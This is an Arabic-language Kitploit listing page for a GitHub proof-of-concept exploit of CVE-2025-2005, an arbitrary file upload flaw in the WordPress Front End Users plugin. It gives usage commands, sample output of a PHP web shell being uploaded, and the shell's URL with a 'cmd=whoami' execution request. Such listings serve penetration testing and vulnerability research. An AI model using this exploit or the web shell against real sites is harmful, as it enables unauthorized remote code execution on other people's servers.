Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-2005 — استغلال ثغرة رفع الملفات التعسفي في WordPress FEUP (CVE-2025-2005) | Kitploit
أدوات/GitHubGitHub/mrmtwoj/cve-2025-2005
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubmrmtwoj/cve-2025-2005

CVE-2025-2005

استغلال ثغرة رفع الملفات التعسفي في WordPress FEUP (CVE-2025-2005)

عرض المستودع
31منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الموقع الإلكتروني

استغلال رفع الملفات التعسفي في WordPress FEUP (CVE-2025-2005)

يوفر هذا المستودع استغلالًا (PoC) لإثبات المفهوم للمكوّن الإضافي Front End Users في WordPress (الإصدارات حتى 3.2.32)، والذي يعاني من ثغرة رفع ملفات تعسفي بسبب غياب التحقق من نوع MIME/نوع الملف في نموذج التسجيل الخاص به. يسمح ذلك للمهاجمين غير المصادَق عليهم برفع ملفات خبيثة (مثل أغلفة الويب)، مما قد يؤدي إلى تنفيذ تعليمات برمجية عن بُعد (RCE) على الخادم.

الميزات

  • CVE-2025-2005: ثغرة رفع الملفات في المكوّن الإضافي Front End Users لـ WordPress
  • واجهة سطر أوامر بسيطة
  • اكتشاف تلقائي لنماذج التسجيل
  • رافع شيل مع اسم مستخدم/كلمة مرور مخصصة

كيف يعمل

  • يرسل طلب تسجيل إلى نموذج تسجيل FEUP المعرض للثغرة.
  • يرفع شيل PHP عبر حقل إدخال الملف، متجاوزًا قيود نوع الملف.
  • يعرض حالة الرفع ويُخبر ما إذا كان الموقع معرضًا للثغرة.

أهداف الاختبار

  • يبحث عن نماذج تسجيل تحتوي على:
  • ewd-feup-register-form
  • في روابط مثل:
root@kitploit:~
/register/
/signup/
  • أو أي رابط موجود في الصفحة الرئيسية

البدء

  • Python 3.x
  • وحدتا requests و beautifulsoup4:
root@kitploit:~
pip install requests beautifulsoup4

التثبيت

root@kitploit:~
https://github.com/mrmtwoj/CVE-2025-2005.git
cd CVE-2025-2005

الاستخدام

root@kitploit:~
python3 exploit.py --url http://target.com --user hacker --password pass123

مثال على المخرجات

root@kitploit:~
[*] Scanning site: http://victim.com
[*] Found 17 pages.
[+] Registration form found at: http://victim.com/register
[*] Uploading shell...
[+] Shell uploaded successfully!

تشغيل الاستغلال

root@kitploit:~
Location ::
http://victim.com/wp-content/uploads/shell.php
http://victim.com/wp-content/uploads/ewd-feup-user-uploads/shell.php
RUN ::
http://victim.com/wp-content/uploads/shell.php?cmd=whoami
تنزيل الأداة